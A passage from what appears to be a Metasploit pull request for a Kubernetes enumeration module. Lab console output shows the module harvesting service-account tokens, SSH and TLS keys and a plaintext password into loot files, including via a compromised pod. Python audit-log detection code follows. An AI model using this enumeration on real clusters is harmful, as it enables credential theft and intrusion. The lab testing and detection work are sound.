13 default secrets-id-rsa-without-passphrase kubernetes.io/ssh-auth ssh-privatekey 21h
14 default secrets-tls kubernetes.io/tls tls.crt,tls.key 21h
15 default secrets-user-password Opaque password,username 21h
16 default sh.helm.release.v1.kubernetes-dashboard.v1 helm.sh/release.v1 release 21h
17 default sh.helm.release.v1.kubernetes-dashboard.v2 helm.sh/release.v1 release 21h
18 default sh.helm.release.v1.kubernetes-dashboard.v3 helm.sh/release.v1 release 19h
19 default sh.helm.release.v1.lucee.v1 helm.sh/release.v1 release 21h
20 default sh.helm.release.v1.secrets.v1 helm.sh/release.v1 release 21h
21 default sh.helm.release.v1.thinkphp.v1 helm.sh/release.v1 release 21h
22 default thinkphp-token-cml9b kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token admin-sa-token-7s98l: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_385248.json
[+] service token default-token-db22s: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_364014.json
[+] service token kubernetes-dashboard-token-h2p5h: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_521672.json
[+] service token lucee-token-stpnz: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_231726.json
[+] basic_auth secrets-basic-auth: root:password123
[+] dockerconfig json secrets-dockerconfigjson: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_docker.json_059484.json
[+] ssh_key secrets-id-ed25519-with-passphrase: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_id_rsa_873214.txt
[+] ssh_key secrets-id-ed25519-without-passphrase: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_id_rsa_940071.txt
[+] ssh_key secrets-id-rsa-with-passphrase: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_id_rsa_746246.txt
[+] ssh_key secrets-id-rsa-without-passphrase: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_id_rsa_865415.txt
[+] tls_key secrets-tls: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_tls.key_328155.txt
[+] tls_cert secrets-tls: /home/smcintyre/.msf4/loot/20211021090832_default_unknown_tls.cert_564163.crt (/CN=example.com)
[+] service token thinkphp-token-cml9b: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_641336.json
[+] Namespace 1: kube-node-lease
Auth (namespace: kube-node-lease)
=================================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-node-lease)
=================================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-node-lease)
====================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-node-lease default-token-rr9hd kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token default-token-rr9hd: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_204461.json
[+] Namespace 2: kube-public
Auth (namespace: kube-public)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-public)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
No rows
Secrets (namespace: kube-public)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-public default-token-jk68r kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token default-token-jk68r: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_784600.json
[+] Namespace 3: kube-system
Auth (namespace: kube-system)
=============================
Resources Non-Resource URLs Resource Names Verbs
--------- ----------------- -------------- -----
*.* [] [] [*]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
[*] [] [*]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
Pods (namespace: kube-system)
=============================
# namespace name status containers ip
- --------- ---- ------ ---------- --
0 kube-system coredns-78fcd69978-9ktdz Running coredns (image: k8s.gcr.io/coredns/coredns:v1.8.4 UDP:53,TCP:53,TCP:9153) 172.17.0.14
1 kube-system etcd-minikube Running etcd (image: k8s.gcr.io/etcd:3.5.0-0) 192.168.49.2
2 kube-system kube-apiserver-minikube Running kube-apiserver (image: k8s.gcr.io/kube-apiserver:v1.22.1) 192.168.49.2
3 kube-system kube-controller-manager-minikube Running kube-controller-manager (image: k8s.gcr.io/kube-controller-manager:v1.22.1) 192.168.49.2
4 kube-system kube-proxy-dzpmf Running kube-proxy (image: k8s.gcr.io/kube-proxy:v1.22.1) 192.168.49.2
5 kube-system kube-scheduler-minikube Running kube-scheduler (image: k8s.gcr.io/kube-scheduler:v1.22.1) 192.168.49.2
6 kube-system storage-provisioner Running storage-provisioner (image: gcr.io/k8s-minikube/storage-provisioner:v5) 192.168.49.2
Secrets (namespace: kube-system)
================================
# namespace name type data age
- --------- ---- ---- ---- ---
0 kube-system attachdetach-controller-token-8dxjl kubernetes.io/service-account-token ca.crt,namespace,token 21h
1 kube-system bootstrap-signer-token-wfvtd kubernetes.io/service-account-token ca.crt,namespace,token 21h
2 kube-system bootstrap-token-bfr928 bootstrap.kubernetes.io/token auth-extra-groups,expiration,token-id,token-secret,usage-bootstrap-authentication,usage-bootstrap-signing 21h
3 kube-system certificate-controller-token-h6jbb kubernetes.io/service-account-token ca.crt,namespace,token 21h
4 kube-system clusterrole-aggregation-controller-token-jqvwq kubernetes.io/service-account-token ca.crt,namespace,token 21h
5 kube-system coredns-token-g7vl2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
6 kube-system cronjob-controller-token-z47mc kubernetes.io/service-account-token ca.crt,namespace,token 21h
7 kube-system daemon-set-controller-token-687t9 kubernetes.io/service-account-token ca.crt,namespace,token 21h
8 kube-system default-token-vkz9f kubernetes.io/service-account-token ca.crt,namespace,token 21h
9 kube-system deployment-controller-token-pkx8p kubernetes.io/service-account-token ca.crt,namespace,token 21h
10 kube-system disruption-controller-token-89g95 kubernetes.io/service-account-token ca.crt,namespace,token 21h
11 kube-system endpoint-controller-token-r524w kubernetes.io/service-account-token ca.crt,namespace,token 21h
12 kube-system endpointslice-controller-token-vmm8h kubernetes.io/service-account-token ca.crt,namespace,token 21h
13 kube-system endpointslicemirroring-controller-token-t79hc kubernetes.io/service-account-token ca.crt,namespace,token 21h
14 kube-system ephemeral-volume-controller-token-gknzr kubernetes.io/service-account-token ca.crt,namespace,token 21h
15 kube-system expand-controller-token-b8mp4 kubernetes.io/service-account-token ca.crt,namespace,token 21h
16 kube-system generic-garbage-collector-token-5w2j5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
17 kube-system horizontal-pod-autoscaler-token-sjrxn kubernetes.io/service-account-token ca.crt,namespace,token 21h
18 kube-system job-controller-token-wn84n kubernetes.io/service-account-token ca.crt,namespace,token 21h
19 kube-system kube-proxy-token-7x5lg kubernetes.io/service-account-token ca.crt,namespace,token 21h
20 kube-system namespace-controller-token-9bb4x kubernetes.io/service-account-token ca.crt,namespace,token 21h
21 kube-system node-controller-token-l44n2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
22 kube-system persistent-volume-binder-token-nhpj2 kubernetes.io/service-account-token ca.crt,namespace,token 21h
23 kube-system pod-garbage-collector-token-sfk5t kubernetes.io/service-account-token ca.crt,namespace,token 21h
24 kube-system pv-protection-controller-token-4mbl5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
25 kube-system pvc-protection-controller-token-htj54 kubernetes.io/service-account-token ca.crt,namespace,token 21h
26 kube-system replicaset-controller-token-fhd7g kubernetes.io/service-account-token ca.crt,namespace,token 21h
27 kube-system replication-controller-token-rw9sx kubernetes.io/service-account-token ca.crt,namespace,token 21h
28 kube-system resourcequota-controller-token-6p6n5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
29 kube-system root-ca-cert-publisher-token-ghc5g kubernetes.io/service-account-token ca.crt,namespace,token 21h
30 kube-system service-account-controller-token-s8kp5 kubernetes.io/service-account-token ca.crt,namespace,token 21h
31 kube-system service-controller-token-lngkb kubernetes.io/service-account-token ca.crt,namespace,token 21h
32 kube-system statefulset-controller-token-bwlgx kubernetes.io/service-account-token ca.crt,namespace,token 21h
33 kube-system storage-provisioner-token-2gj94 kubernetes.io/service-account-token ca.crt,namespace,token 21h
34 kube-system token-cleaner-token-fwbmc kubernetes.io/service-account-token ca.crt,namespace,token 21h
35 kube-system ttl-after-finished-controller-token-jrfjc kubernetes.io/service-account-token ca.crt,namespace,token 21h
36 kube-system ttl-controller-token-nv9px kubernetes.io/service-account-token ca.crt,namespace,token 21h
[+] service token attachdetach-controller-token-8dxjl: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_672817.json
[+] service token bootstrap-signer-token-wfvtd: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_409785.json
[+] service token certificate-controller-token-h6jbb: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_105875.json
[+] service token clusterrole-aggregation-controller-token-jqvwq: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_407539.json
[+] service token coredns-token-g7vl2: /home/smcintyre/.msf4/loot/20211021090832_default_192.168.159.31_kubernetes.token_197339.json
[+] service token cronjob-controller-token-z47mc: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_001715.json
[+] service token daemon-set-controller-token-687t9: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_109824.json
[+] service token default-token-vkz9f: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_864341.json
[+] service token deployment-controller-token-pkx8p: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_882366.json
[+] service token disruption-controller-token-89g95: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_729155.json
[+] service token endpoint-controller-token-r524w: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_553175.json
[+] service token endpointslice-controller-token-vmm8h: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_531612.json
[+] service token endpointslicemirroring-controller-token-t79hc: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_719909.json
[+] service token ephemeral-volume-controller-token-gknzr: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_299322.json
[+] service token expand-controller-token-b8mp4: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_625595.json
[+] service token generic-garbage-collector-token-5w2j5: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_062775.json
[+] service token horizontal-pod-autoscaler-token-sjrxn: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_768626.json
[+] service token job-controller-token-wn84n: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_976515.json
[+] service token kube-proxy-token-7x5lg: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_473723.json
[+] service token namespace-controller-token-9bb4x: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_940487.json
[+] service token node-controller-token-l44n2: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_172853.json
[+] service token persistent-volume-binder-token-nhpj2: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_485217.json
[+] service token pod-garbage-collector-token-sfk5t: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_031269.json
[+] service token pv-protection-controller-token-4mbl5: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_002130.json
[+] service token pvc-protection-controller-token-htj54: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_534652.json
[+] service token replicaset-controller-token-fhd7g: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_985201.json
[+] service token replication-controller-token-rw9sx: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_951165.json
[+] service token resourcequota-controller-token-6p6n5: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_907963.json
[+] service token root-ca-cert-publisher-token-ghc5g: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_679333.json
[+] service token service-account-controller-token-s8kp5: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_865252.json
[+] service token service-controller-token-lngkb: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_139882.json
[+] service token statefulset-controller-token-bwlgx: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_917405.json
[+] service token storage-provisioner-token-2gj94: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_951179.json
[+] service token token-cleaner-token-fwbmc: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_377555.json
[+] service token ttl-after-finished-controller-token-jrfjc: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_438999.json
[+] service token ttl-controller-token-nv9px: /home/smcintyre/.msf4/loot/20211021090833_default_192.168.159.31_kubernetes.token_513477.json
[*] Auxiliary module execution completed
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >
Action command w/JSON output
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) > namespace OUTPUT=json
[*] Routing traffic through session: 2
[+] Kubernetes service host: 10.96.0.1:443
[
{
"metadata": {
"name": "default",
"uid": "d56f9f69-5445-4748-ab08-44c584c1168c",
"resourceVersion": "205",
"creationTimestamp": "2021-10-20T15:51:36Z",
"labels": {
"kubernetes.io/metadata.name": "default"
},
"managedFields": [
{
"manager": "kube-apiserver",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-10-20T15:51:36Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:labels": {
".": {
},
"f:kubernetes.io/metadata.name": {
}
}
}
}
}
]
},
"spec": {
"finalizers": [
"kubernetes"
]
},
"status": {
"phase": "Active"
}
},
{
"metadata": {
"name": "kube-node-lease",
"uid": "1ce005ce-6e7f-481b-ac87-c9e7d140e6a3",
"resourceVersion": "46",
"creationTimestamp": "2021-10-20T15:51:35Z",
"labels": {
"kubernetes.io/metadata.name": "kube-node-lease"
},
"managedFields": [
{
"manager": "kube-apiserver",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-10-20T15:51:35Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:labels": {
".": {
},
"f:kubernetes.io/metadata.name": {
}
}
}
}
}
]
},
"spec": {
"finalizers": [
"kubernetes"
]
},
"status": {
"phase": "Active"
}
},
{
"metadata": {
"name": "kube-public",
"uid": "5ba1b158-1529-4a03-b412-8ed587ca4e70",
"resourceVersion": "30",
"creationTimestamp": "2021-10-20T15:51:35Z",
"labels": {
"kubernetes.io/metadata.name": "kube-public"
},
"managedFields": [
{
"manager": "kube-apiserver",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-10-20T15:51:35Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:labels": {
".": {
},
"f:kubernetes.io/metadata.name": {
}
}
}
}
}
]
},
"spec": {
"finalizers": [
"kubernetes"
]
},
"status": {
"phase": "Active"
}
},
{
"metadata": {
"name": "kube-system",
"uid": "1073b6ff-fef7-4dcd-9e8a-1e1b2b374537",
"resourceVersion": "7",
"creationTimestamp": "2021-10-20T15:51:35Z",
"labels": {
"kubernetes.io/metadata.name": "kube-system"
},
"managedFields": [
{
"manager": "kube-apiserver",
"operation": "Update",
"apiVersion": "v1",
"time": "2021-10-20T15:51:35Z",
"fieldsType": "FieldsV1",
"fieldsV1": {
"f:metadata": {
"f:labels": {
".": {
},
"f:kubernetes.io/metadata.name": {
}
}
}
}
}
]
},
"spec": {
"finalizers": [
"kubernetes"
]
},
"status": {
"phase": "Active"
}
}
]
[*] Auxiliary module execution completed
msf6 auxiliary(cloud/kubernetes/enum_kubernetes) >
Release Notes
This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.
Note, this PR was additionally reviewed by @zeroSteiner in a separate pull request zeroSteiner#14
Adds support for a new Kubernetes enum module. Similar to #15733 - the user must have a Kubernetes JWT token, and access to the Kubernetes REST API through some means (either direct or through a compromised pod). A session on an existing pod can be used to configure a few options, including the JWT token and RHOST / RPORT options. Some changes were made to the RHOSTS and SESSION validation code to honor instances in which they are marked as optional. When defined, the validation still takes place either way, but when they are marked as optional and blank the validation is skipped to allow the module to run.
Verification
After setting up a Kubernetes cluster locally/remotely with #15773, the following scenarios should work.
Directly connecting to the Kubernetes API:
The following commands should work:
run
namespaces
namespaces name=kube-public
auth
auth output=json
secrets
pods
pod
pod namespace=default name=redis-7fd956df5-sbchb
pod namespace=default name=redis-7fd956df5-sbchb output=json
pod namespace=default name=redis-7fd956df5-sbchb output=table
version
As well as pivoting through a compromised container:
Additional context is in the module documentation, which is in the File Changed tab
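A defender's view of the enumeration shown above, as an added example that is not part of this pull request or of Metasploit: Python detection logic that scans Kubernetes API server audit events for one identity reading secrets in several namespaces within a short window, which is the pattern the `all` action produces. The audit lines, service account names and thresholds are constructed, and it assumes audit logging is enabled and that the per-namespace Auth tables come from SelfSubjectRulesReview requests, which the page does not state.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%dT%H:%M:%S.%fZ"

def audit_line(ts, user, verb, resource, namespace="", stage="ResponseComplete"):
    """Build one constructed audit.k8s.io/v1 event (Metadata level) as a JSON line."""
    return json.dumps({"kind": "Event", "stage": stage, "verb": verb,
                       "requestReceivedTimestamp": ts, "user": {"username": user},
                       "objectRef": {"resource": resource, "namespace": namespace}})

# Constructed sample log: identities, namespaces and times are made up for the example.
POD_SA = "system:serviceaccount:default:webapp"
CI_SA = "system:serviceaccount:ci:deployer"
SAMPLE_LOG = [
    audit_line("2021-10-21T13:08:32.100000Z", POD_SA, "create", "selfsubjectrulesreviews"),
    audit_line("2021-10-21T13:08:32.200000Z", POD_SA, "list", "secrets", "default", "RequestReceived"),
    audit_line("2021-10-21T13:08:32.210000Z", POD_SA, "list", "secrets", "default"),
    audit_line("2021-10-21T13:08:32.400000Z", POD_SA, "create", "selfsubjectrulesreviews"),
    audit_line("2021-10-21T13:08:32.500000Z", POD_SA, "list", "secrets", "kube-public"),
    audit_line("2021-10-21T13:08:33.100000Z", POD_SA, "list", "secrets", "kube-system"),
    audit_line("2021-10-21T12:00:00.000000Z", CI_SA, "list", "secrets", "ci"),
    audit_line("2021-10-21T13:30:00.000000Z", CI_SA, "list", "secrets", "staging"),
    '{"kind": "Event", "stage": "Respon',  # truncated line, as seen in rotated logs
]

def find_namespace_sweeps(lines, window=timedelta(seconds=60), min_namespaces=3):
    """Flag identities that read secrets in many namespaces within one time window."""
    # Assumption: SelfSubjectRulesReview creates accompany the sweep; they are only counted.
    secret_reads, rules_reviews = defaultdict(list), defaultdict(list)
    for line in lines:
        try:
            ev = json.loads(line)
            when = datetime.strptime(ev["requestReceivedTimestamp"], TS_FORMAT)
            user, ref = ev["user"]["username"], ev.get("objectRef") or {}
        except (ValueError, KeyError, TypeError):
            continue  # skip truncated or non-event lines
        if ev.get("stage") != "ResponseComplete":
            continue  # one request emits several stages; count it once
        if ref.get("resource") == "secrets" and ev.get("verb") in ("get", "list"):
            if ref.get("namespace"):
                secret_reads[user].append((when, ref["namespace"]))
        elif ref.get("resource") == "selfsubjectrulesreviews" and ev.get("verb") == "create":
            rules_reviews[user].append(when)
    findings = []
    for user, reads in sorted(secret_reads.items()):
        reads.sort()
        best, span, start = set(), None, 0
        for end, (when, _) in enumerate(reads):
            while when - reads[start][0] > window:
                start += 1  # slide the window forward
            seen = {ns for _, ns in reads[start:end + 1]}
            if len(seen) > len(best):
                best, span = seen, (reads[start][0], when)
        if len(best) >= min_namespaces:
            lo, hi = span[0] - window, span[1] + window
            reviews = [t for t in rules_reviews.get(user, []) if lo <= t <= hi]
            findings.append({"user": user, "namespaces": sorted(best),
                             "rules_reviews": len(reviews)})
    return findings
```

SelfSubjectRulesReview is a cluster-scoped create whose target namespace sits in the request body, so at Metadata audit level only the count of those requests is visible, not the namespaces they asked about.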